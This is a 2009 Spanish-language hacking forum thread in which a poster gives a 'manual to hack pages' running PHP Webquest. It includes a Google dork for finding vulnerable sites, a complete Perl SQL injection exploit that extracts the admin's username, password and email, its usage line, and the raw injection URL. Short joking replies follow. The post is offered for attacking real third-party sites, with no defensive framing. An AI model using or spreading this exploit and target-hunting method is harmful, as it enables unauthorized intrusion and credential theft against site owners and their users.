Tutorial sobre bug phpwebquest

Doddy · 16-abr-2009, 18:08

Hola es un corto manual para hackear paginas que corran phpwebquest ( muy facil Xd)

Para empezar hay que buscar paginas vulnerables mediante dorks

Abrimos google y buscamos allinurl:/phpwebquest/webquest

Una forma de uso mas facil seria con mi programa google-search

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

Ok ahora a expotar la vulnerabilidad para empezar deben tener conocimiento de perl
Aca el exploit

Código:

#!/usr/bin/perl

# PHP Webquest 2.6 Remote SQL Injection Exploit
# coded by ka0x - D.O.M TEAM 2008
# we are: ka0x, an0de, xarnuz

# download spanish: download: 
  


  
    
    
    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]

  

  

# download english: 
  


  
    
    
    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]

  

  


# vuln in soporte_horizontal_w.php:

# if ($_GET['id_actividad']!=''){ $id_actividad=$_GET['id_actividad']; }
# $sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad;

# ka0x @domlabs:~# perl phpwebquest.pl 
  


  
    
    
    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]

  

  

#
# [+] connecting in 
  


  
    
    
    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]

  

  
...
# [!] user: ka0x [!] pass: test [!] e-mail: test @test.com

use strict;
use LWP::UserAgent;

my $host = $ARGV[0];
if ($host !~ /^http:/){ $host = 'http://'.$host; }

 if(!$ARGV[0]) {
  print "\n[x] PHP Webquest 2.6 Remote SQL Injection exploit\n";
  print "[x] written by ka0x - ka0x01[at]gmail.com\n";
  print "[x] usage: perl $0 [host]\n";
  print "[x] example: 
  


  
    
    
    [Solo usuarios registrados pueden 
    ver los links. 
    REGISTRARSE]

  

  

  exit(1);
 }
 
  print "\n[+] connecting in $host...\n";
  my $cnx = LWP::UserAgent->new() or die;
  my $go=$cnx->get($host."/soporte_horizontal_w.php?id_actividad=-1/**/union/**/select/**/1,1,1,1,concat(0x5f5f5f5f,0x5b215d20757365723a20,usuario,0x20205b215d20706173733a20,password,0x205b215d20652d6d61696c3a20,e_mail,0x5f5f5f5f)/**/from/**/usuario/*");
  if ($go->content =~ m/____(.*?)____/ms) {
    print "$1\n";
  } else {
    print "\n[-] exploit failed\n";
}

Para usarlo seria :

Código:

perl phpweb.pl  pepito.com/phpwebquest

Con esto obtendran el email ,nombre de usuario y contraseña del admin .......Un bug poderoso.....

Si no quieren usar el exploit perl pues........ deberian hacer esto

pepito.com/phpwebquest/soporte_horizontal_w.php?id_actividad=-1/**/union/**/select/**/1,1,1,1,concat(0x5f5f5f5f,0x5b215d20757365723a20,u suario,0x20205b215d20706173733a20,password,0x205b2 15d20652d6d61696c3a20,e_mail,0x5f5f5f5f)/**/from/**/usuario/*

Espero que te haya gustado el manual ,si te gusta el exploit ve a perl que voy a postear el exploit.pl + automatizador.pl

Saludos

Lepuke

CiberTron · 18-abr-2009, 20:59

Tuto traks :

este si no telo creo

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

;D ;D

Doddy · 19-abr-2009, 13:24

Cita:

Iniciado por aleqiu

Tuto traks :

este si no telo creo

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

;D ;D

Estaba muy inspirado mientra hacia mi Web ;D

Herramientas
Mostrar Versión Imprimible Enviar por Correo
Desplegado
Mode Lineal Cambiar a Modo Hibrido Cambiar a Modo Hilado

Temas Similares
Tema	Autor	Foro	Respuestas	Último mensaje
Tutorial sobre Metasploit Framework	cuban-hack	Bug y Exploits	22	24-dic-2009 08:13
Automatizador de exploit phpwebquest	Doddy	Perl	0	16-abr-2009 18:10
Tutorial sobre mikrotik	usarioma	Sistemas operativos libres.	1	22-dic-2007 09:07
duda sobre tutorial de DarknessFeatSunny	system215	Troyanos y virus	2	15-dic-2007 15:13
Tutorial Sobre Refrigeraci�n	komkal	Overclocking, Refrigeracion y demas	2	15-sep-2005 08:57